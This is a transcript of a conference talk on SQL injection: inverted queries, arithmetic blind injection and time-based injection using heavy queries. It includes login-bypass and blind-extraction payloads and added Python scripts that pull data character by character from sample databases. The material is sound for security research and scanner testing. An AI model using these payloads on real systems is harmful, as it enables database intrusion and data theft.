How "·$% developers defeat the web vulnerability scanners


Comments (2)
  • Read the ppt and watch the video. Comments are not working in those environments... Learn before commenting, please.
  • The term 'inverted queries' is a fallacy. Slightly better automated tools than the ones you've tested (e.g. sqlmap) use something called 'comments' to comment out the rest of the query in your 'inverted query'. Slide 19/66: instead of '?v_value=2 and 1=1' use '?v_value=2 and 1=1-- ' and that's it. Please don't evangelise 'inverted queries'. Use 'parametrized' queries, for God's sake.
Presentation Transcript
1. How ?¿$·& developers defeat the most famous web vulnerability scanners ...or how to recognize old friends
   Chema Alonso, Informática64
   José Parada, Microsoft Ibérica

2. Agenda
   1.- Introduction
   2.- Inverted Queries
   3.- Arithmetic Blind SQL Injection
   4.- Time-Based Blind SQL Injection using Heavy Queries
   5.- Conclusions

3. 1.- Introduction

4. SQL Injection is still here among us

5. Web Application Security Consortium: comparison
   http://projects.webappsec.org/Web-Application-Security-Statistics
   12,186 sites, 97,554 bugs

6. Need to Improve Automatic Scanning
   Manual scanning is not always possible:
     Time
     Confidentiality
     Money, money, money...
   We need to study new ways of recognizing old-fashioned vulnerabilities, to improve the automatic scanning tools.

7. 2.- Inverted Queries

8. (image only, no text in the transcript)

9. Homers, how are they?
   Lazy
   Badly trained
   Poor experience in security stuff
   Don't like working
   Don't like computing
   Don't like coding
   Don't like you!

10. Flanders are left-handed

11. Right
    SELECT UID
    FROM USERS
    WHERE NAME='V_NAME'
    AND
    PASSWORD='V_PASSW';

12. Wrong?
    SELECT UID
    FROM USERS
    WHERE 'V_NAME'=NAME AND
    'V_PASSW'=PASSWORD

13. Login Inverted Query
    Select uid
    From users where 'v_name'=name and 'v_pass'=password
    http://www.web.com/login.php?v_name=Robert&v_pass=Kubica' or '1'='1
    Select uid
    From users where 'Robert'=name and 'Kubica' or '1'='1'=password
    -> FAIL

14. Login Inverted SQL Injection, an example
    Select uid
    From users where 'v_name'=name and 'v_pass'=password
    http://www.web.com/login.php?v_name=Robert&v_pass='='' or '1'='1' or 'Kubica
    Select uid
    From users where 'Robert'=name and ''='' or '1'='1' or 'Kubica'=password
    -> Success

15. Blind Attacks
    The attacker injects code but cannot access the data directly.
    However, the injection changes the behavior of the web application.
    The attacker then looks for differences between true injections (1=1) and false injections (1=2) in the response pages to extract data.
      Blind SQL Injection
      Blind XPath Injection
      Blind LDAP Injection

16. Blind SQL Injection Attacks
    The attacker injects:
      "True where clauses"
      "False where clauses"
      Ex:
        Program.php?id=1 and 1=1
        Program.php?id=1 and 1=2
    The program does not return any visible data from the database, nor any data in error messages.
    The attacker cannot see any data extracted from the database.

17. Blind SQL Injection Attacks
    The attacker analyzes the response pages looking for differences between the "True-Answer Page" and the "False-Answer Page":
      Different hashes
      Different HTML structure
      Different patterns (keywords)
      Different linear ASCII sums
      "Different behavior", for example: response time

18. Blind SQL Injection Attacks
    If any difference exists, the attacker can extract all the information from the database.
    How? Using "booleanization":
      MySQL:
        Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
        "True-Answer Page" or "False-Answer Page"?
      MSSQL:
        Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
      Oracle:
        Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)

19. Blind Inverted Query
    Select product
    From products
    Where v_value=id;
    http://www.web.com/products.php?v_value=2 and 1=1
    Select product
    From products
    Where 2 and 1=1=id;
    -> FAIL
    (The comparison chain is left-associative: "2 and 1=1=id" is "2 AND ((1=1)=id)", i.e. "2 AND 1=id", so the row with id=2 is no longer matched and the scanner's "true" page differs from the original one.)

20. The MySQL Case
    1 is True
    1=1=1 -> True
    1=1=(1+1-1)=abs(1)=1 -> True
    2=2=2 -> False
      -> 2=2 becomes True -> True=2
      -> True equals 1, so this is 1=2, which is False
    Select product
    From products
    Where v_value=id;
    http://www.web.com/products.php?v_value=1 and 1=1
    Select product
    From products
    Where 1 and 1=1=id;
    -> SUCCESS (if there is an id=1)
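The following is an added example, not code from the talk: it rebuilds the two "left-handed" queries of slides 12-20 on an in-memory SQLite database (standing in for the MySQL backend on the slides; the assumption is that SQLite parses these payloads the same way, with AND binding tighter than OR and "=" chaining left to right), replays the classic login payload (slide 13), the inverted one (slide 14), the numeric "and 1=1 / and 1=2" probe pair a boolean-blind scanner sends (slides 19-20), the "-- " terminated variant raised in the comment thread, and the parameterized query that removes the problem. The table contents, names and passwords are constructed sample data.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database standing in for the
# MySQL backend on the slides (assumption: SQLite parses these payloads the
# same way, i.e. AND binds tighter than OR and '=' chains left to right).
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users(uid INTEGER, name TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'Robert', 'Kubica'), (2, 'Homer', 'donut');
    CREATE TABLE products(id INTEGER, product TEXT);
    INSERT INTO products VALUES (1, 'tyres'), (2, 'fuel'), (3, 'wing');
""")


def login_inverted(v_name, v_pass):
    """Slides 12-14: the 'left-handed' login, built by string concatenation."""
    sql = "SELECT uid FROM users WHERE '%s'=name AND '%s'=password" % (v_name, v_pass)
    return [row[0] for row in db.execute(sql)]


def products_inverted(v_value):
    """Slides 19-20: numeric parameter on the left of the '=' (WHERE v_value=id)."""
    sql = "SELECT product FROM products WHERE %s=id" % v_value
    return [row[0] for row in db.execute(sql)]


def scanner_finds_numeric_blind(base):
    """What the boolean-blind scanners of slide 21 do: append ' and 1=1' and
    ' and 1=2' to the value and report a bug when the first page equals the
    baseline and the second one differs. With the inverted query this only
    works when the baseline value happens to be 1 (slide 20)."""
    baseline = products_inverted(str(base))
    true_page = products_inverted("%d and 1=1" % base)
    false_page = products_inverted("%d and 1=2" % base)
    return true_page == baseline and false_page != baseline


def comment_probe_pages(base):
    """The check from the comment thread: a '-- ' terminator comments out the
    trailing '=id', so the true/false pair differs again if the application
    lets the comment through."""
    return (products_inverted("%d and 1=1-- " % base),
            products_inverted("%d and 1=2-- " % base))


def login_parameterized(v_name, v_pass):
    """The fix: bound parameters. Operand order is then irrelevant."""
    sql = "SELECT uid FROM users WHERE ?=name AND ?=password"
    return [row[0] for row in db.execute(sql, (v_name, v_pass))]


if __name__ == "__main__":
    print(login_inverted("Robert", "Kubica' or '1'='1"))           # []  (slide 13: FAIL)
    print(login_inverted("Robert", "'='' or '1'='1' or 'Kubica"))  # [1, 2]  (slide 14: Success)
    print(products_inverted("2 and 1=1"))                          # ['tyres'], not 'fuel' (slide 19)
    print(scanner_finds_numeric_blind(2), scanner_finds_numeric_blind(1))  # False True
    print(comment_probe_pages(2))
```

Run it as a script to see each page, or import it and call the functions; the scanner check returns True only for base value 1, which is why the scanners on slide 21 report nothing when they happen to probe another product id.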
21. Web Scanner behaviors
    Acunetix
    Paros
    AppScan
    W3af
    Wapiti
    Proxy Strike

22. Acunetix & Homer
23. Acunetix & Flanders
24. AppScan & Homer
25. AppScan & Flanders
26. Paros & Homer
27. Paros & Flanders
28. W3af & Homer
29. W3af & Flanders
30. Wapiti & Homer
31. Wapiti & Flanders
    (screenshot slides, no text in the transcript)

32. Demo
    W3af
    Wapiti
    Proxy Strike

33. Results
    Table: scanners (Paros, AppScan, Acunetix, w3af, wapiti, Proxy Strike) against Normal and Inverted queries, each on MySQL and MS SQL Server, with Numeric and String parameters. The per-cell results were images and are not in the transcript.

34. In the end...
    OUCH!!!
    Thank God for keeping me safe

35. Solutions?
    Concat string injection
    Arithmetic Blind SQL Injection
    Time-Based Blind SQL Injection
      Delay functions
      Heavy queries
36. 3.- Arithmetic

37. What about these queries?
    How to detect/exploit this Blind SQL Injection vulnerability?
      The query forces the parameter to be numeric
      SELECT field FROM table WHERE id=abs(param)
      Ex:
        Get Param(ID)
        Select … Where att1=abs(ID)
        Select … Where att2=k1-ID
        Print response
    No AND or OR operators can be used.
    Boolean logic has to be built with math operations.

38. Arithmetic Blind SQL Injection
    Divide by zero (David Litchfield)
      Id=A+(1/(ASCII(B)-C))
        A -> Param value originally used in the query.
        B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        C -> Counter [0..255]
      TRUE: when ASCII(B)=C, the DB generates a divide-by-zero exception.

39. Arithmetic Blind SQL Injection
    Sums and subtractions
      Id=A+ASCII(B)-C
        A -> Param value originally used in the query.
        B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        C -> Counter [0..255]
      When ASCII(B)=C, the response page for id=A+ASCII(B)-C is the same as for id=A.

40. Arithmetic Blind SQL Injection
    Value type overflow
      Id=A+((C/ASCII(B))*(K))
        A -> Param value originally used in the query.
        B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        C -> Counter [0..255]
        K -> Value that overflows the type defined for A
          (e.g. if A is an integer, then K=2^32)
      When C/ASCII(B)==1, K*1 overflows the data type.

41. Demo:
    Divide by zero
    Sums and subtractions
    Integer overflow

42. Conclusions
    Arithmetic Blind SQL Injection allows binary logic to be built without "AND" and "OR".
      It detects bugs in this kind of queries...
      ...and also in inverted queries in which a numeric value is used.
    Almost none of the vulnerability scanners use this method.
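The following is an added example, not code from the talk or from the Marathon tool: it exercises the abs()-wrapped query of slide 37 on an in-memory SQLite database (standing in for the engine on the slides; tables, the admins row and the secret value are constructed sample data) and extracts a string with the two arithmetic oracles of slides 38 and 39. It first reads the length of the value with the same oracle, so the character loop knows when to stop. One caveat is built in: SQLite, like MySQL with its default settings, answers a division by zero with NULL rather than with the error slide 38 expects from SQL Server, so the divide-by-zero tell here is an empty page (or an error, if the engine raises one); unicode() is SQLite's name for ASCII().

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database standing in for the
# backend on the slides. SQLite, like MySQL by default, returns NULL for a
# division by zero instead of raising the error slide 38 relies on.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE items(id INTEGER, name TEXT);
    INSERT INTO items VALUES (1, 'tyres'), (2, 'fuel'), (3, 'wing');
    CREATE TABLE admins(login TEXT, passwd TEXT);
    INSERT INTO admins VALUES ('root', 'S3cr');
""")

A = 2  # the parameter value the page normally receives (slide 38: "A")


def page(param):
    """Slide 37: the parameter is forced numeric with abs() and concatenated.
    There are no quotes to break out of, and an AND/OR probe would replace
    the id with a 0/1 boolean, so the usual true/false pair is useless."""
    sql = "SELECT name FROM items WHERE id=abs(%s)" % param
    return [row[0] for row in db.execute(sql)]


def char_expr(pos):
    """The value B we are searching for, as a scalar subquery
    (unicode() is SQLite's ASCII())."""
    return "(SELECT unicode(substr(passwd,%d,1)) FROM admins)" % pos


def find_by_sum(expr):
    """Slide 39: id = A + expr - C. The page equals the baseline page(A)
    exactly when C == expr. Scan C upwards and stop at the first hit: because
    of abs(), C = 2*A + expr would also match, but it comes later."""
    baseline = page(A)
    for c in range(256):
        if page("%d + %s - %d" % (A, expr, c)) == baseline:
            return c
    return None


def find_by_divzero(expr):
    """Slide 38: id = A + 1/(expr - C). When C == expr the engine either raises
    (SQL Server) or yields NULL (SQLite, MySQL), so the tell is an error or an
    empty page. With integer division the id otherwise stays at A, A+1 or A-1,
    so those rows must exist for the empty page to be unambiguous."""
    for c in range(256):
        try:
            rows = page("%d + 1/(%s - %d)" % (A, expr, c))
        except sqlite3.OperationalError:
            return c
        if rows == []:
            return c
    return None


def extract_passwd(find=find_by_sum):
    """Read admins.passwd one character at a time, using the length first so
    the loop knows when to stop."""
    length = find("(SELECT length(passwd) FROM admins)")
    return "".join(chr(find(char_expr(i))) for i in range(1, length + 1))


if __name__ == "__main__":
    print(page(A))                          # ['fuel']: the baseline page
    print(extract_passwd(find_by_sum))      # S3cr
    print(extract_passwd(find_by_divzero))  # S3cr
```

Both oracles need up to 256 requests per character, which is what the linear counter on the slides costs; the trade-off is that neither needs AND, OR or a comparison operator inside the injected expression.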
43. 4.- Time-based Blind SQL Injection using heavy queries

44. Time-Based Blind SQL Injection
    In scenarios with no differences between the "True-Answer Page" and the "False-Answer Page", time delays can be used.
    The injection forces a delay in the response page when the injected condition is True.
      Delay functions:
        SQL Server: waitfor
        Oracle: dbms_lock.sleep
        MySQL: sleep or benchmark function
        Postgres: pg_sleep
      Ex:
        ; if (exists(select * from users)) waitfor delay '0:0:5'

45. Time-Based Blind SQL Injection
    What about DBs without delay functions, i.e.:
      Oracle connections without PL/SQL injection
      MS Access
      DB2
    Can we still exploit Time-Based Blind SQL Injection attacks?

46. (no text in the transcript)

47. "Where-Clause" execution order
    Select "whatever"
    From whatever
    Where condition1 and condition2
      Condition1 lasts 10 seconds
      Condition2 lasts 100 seconds
    Which condition should be executed first?

48. The heavy condition first

    Condition2 (100 sec)   Condition1 (10 sec)   Condition2 & Condition1   Response time
    TRUE                   FALSE                 FALSE                     110 sec
    TRUE                   TRUE                  TRUE                      110 sec
    FALSE                  Not evaluated         FALSE                     100 sec

49. The light condition first

    Condition1 (10 sec)    Condition2 (100 sec)  Condition1 & Condition2   Response time
    TRUE                   FALSE                 FALSE                     110 sec
    TRUE                   TRUE                  TRUE                      110 sec
    FALSE                  Not evaluated         FALSE                     10 sec

50. Time-Based Blind SQL Injection using Heavy Queries
    The attacker can perform an exploitation by delaying the "True-answer page" with a heavy query.
    It depends on how the database engine evaluates the where clauses in the query.
    There are two types of database engines:
      Databases without an optimization process
      Databases with an optimization process

51. Time-Based Blind SQL Injection using Heavy Queries
    The attacker can inject a heavy cross-join condition to delay the response page on True injections.
    The cross-join injection must be heavier than the other condition.
    The attacker only has to know, or guess, the name of a table with select permission in the database.
    Example in MSSQL:
      Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

52. "Default" tables to construct a heavy query
    Microsoft SQL Server: sysusers
    Oracle: all_users
    MySQL (version 5): information_schema.columns
    Microsoft Access:
      MSysAccessObjects (97 & 2000 versions)
      MSysAccessStorage (2003 & 2007)

53. "Default" tables to construct a heavy query
    ... or whatever you can guess:
      Clients
      Customers
      News
      Logins
      Users
      Providers
      ... use your imagination ...
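The following is an added example, not code from the talk or from the Marathon tool: it runs the heavy-query technique of slides 47-53 end to end on an in-memory SQLite database (standing in for the engines on the slides; the products, users and heavy tables and their rows are constructed sample data, and the heavy table plays the part of sysusers or all_users). The page returns the same result for a true and a false injection, so only the response time carries information; the attacker first calibrates a threshold with a known-true and a known-false injection, then runs the booleanization of slide 18 as a binary search driven by the timing oracle. Slide 51 writes the payload as "heavy > 1 AND condition" and relies on the engine evaluating the cheap condition first (the "light condition first" table); because that ordering is engine-specific, this example instead places the cross join in the THEN branch of a CASE expression, so it is evaluated only when the condition holds whichever way the engine orders WHERE terms. That is a variation on the slide's payload, not the one on the slide.

```python
import sqlite3
import time

# Constructed sample data: an in-memory SQLite database standing in for the
# engines on the slides. 'heavy' plays the part of sysusers / all_users: any
# readable table will do, the self cross join is what burns the time.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE products(id INTEGER, product TEXT);
    INSERT INTO products VALUES (1, 'tyres'), (2, 'fuel');
    CREATE TABLE users(name TEXT);
    INSERT INTO users VALUES ('Robert');
    CREATE TABLE heavy(n INTEGER);
""")
db.executemany("INSERT INTO heavy VALUES (?)", [(i,) for i in range(100)])

# Three-way self cross join: 100^3 rows to count, on the order of 0.1 s in SQLite.
HEAVY = "(SELECT count(*) FROM heavy AS h1, heavy AS h2, heavy AS h3)"


def page(param):
    """products.php?id=<param>, concatenated. True and false injections below
    return exactly the same page, so only the response time carries a bit."""
    sql = "SELECT product FROM products WHERE id=%s" % param
    return [row[0] for row in db.execute(sql)]


def timed(param):
    t0 = time.perf_counter()
    page(param)
    return time.perf_counter() - t0


def heavy_probe(cond):
    """Injected tail. Slide 51 writes 'heavy>1 AND cond' and leaves it to the
    optimizer to evaluate the cheap cond first; here the cross join sits in
    the THEN branch of a CASE, so it runs only when cond is true regardless of
    how the engine orders WHERE terms, and the '>= 0' keeps the page unchanged."""
    return "1 AND (CASE WHEN %s THEN %s ELSE 0 END) >= 0" % (cond, HEAVY)


def calibrate():
    """First thing an attacker does: time a known-true and a known-false
    injection and put the decision threshold halfway between them."""
    t_true = timed(heavy_probe("1=1"))
    t_false = timed(heavy_probe("1=2"))
    return (t_true + t_false) / 2


def is_true(cond, threshold):
    return timed(heavy_probe(cond)) > threshold


def extract_first_user(threshold, max_len=16):
    """Slide 18's booleanization driven by the timing oracle: a binary search
    over the code point of each character of the first users.name (7 heavy
    probes at most per character). unicode() is SQLite's ASCII()."""
    name = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "(SELECT unicode(substr(name,%d,1)) FROM users LIMIT 1) > %d" % (pos, mid)
            if is_true(cond, threshold):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # substr() past the end of the string: nothing there
            break
        name += chr(lo)
    return name


if __name__ == "__main__":
    th = calibrate()
    print("threshold %.3f s" % th)
    print(extract_first_user(th))   # Robert
```

Size the cross join to the target: the slides show 14, 22 and 39 seconds for a true answer on real engines, which is far more than needed; a delay clearly above the network jitter is enough, and the calibration step is what makes the threshold independent of the absolute numbers.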
54. Ex 1: MS SQL Server
    Query takes 14 seconds -> True-Answer

55. Ex 1: MS SQL Server
    Query takes 1 second -> False-Answer

56. Ex 2: Oracle
    Query takes 22 seconds -> True-Answer

57. Ex 2: Oracle
    Query takes 1 second -> False-Answer

58. Ex 3: Access 2007
    Query takes 39 seconds -> True-Answer

59. Ex 3: Access 2007
    Query takes 1 second -> False-Answer

60. Marathon Tool
    Automates Time-Based Blind SQL Injection attacks using heavy queries on SQL Server, MySQL, MS Access and Oracle databases.
    Schema extraction from known databases.
    Extracts data using heavy queries no matter which database engine (without schema).
    Developed in .NET
    Source code available
    http://www.codeplex.com/marathontool

61. Demo: Marathon Tool

62. 5.- Conclusions

63. The real world has plenty of kinds of developers...

64. References
    Inverted SQL queries (Spanish)
    http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html
    Arithmetic Blind SQL Injection (Spanish)
    http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html
    Time-Based Blind SQL Injection using heavy queries & Marathon Tool
    http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
    Marathon Tool
    http://www.codeplex.com/marathontool
    Connection String Attacks (Spanish)
    http://www.slideshare.net/chemai64/connection-string-parameter-pollution

65. Don't complain about your job!!

66. Thanks!
    Chema Alonso ([email_address])
    José Parada ([email_address])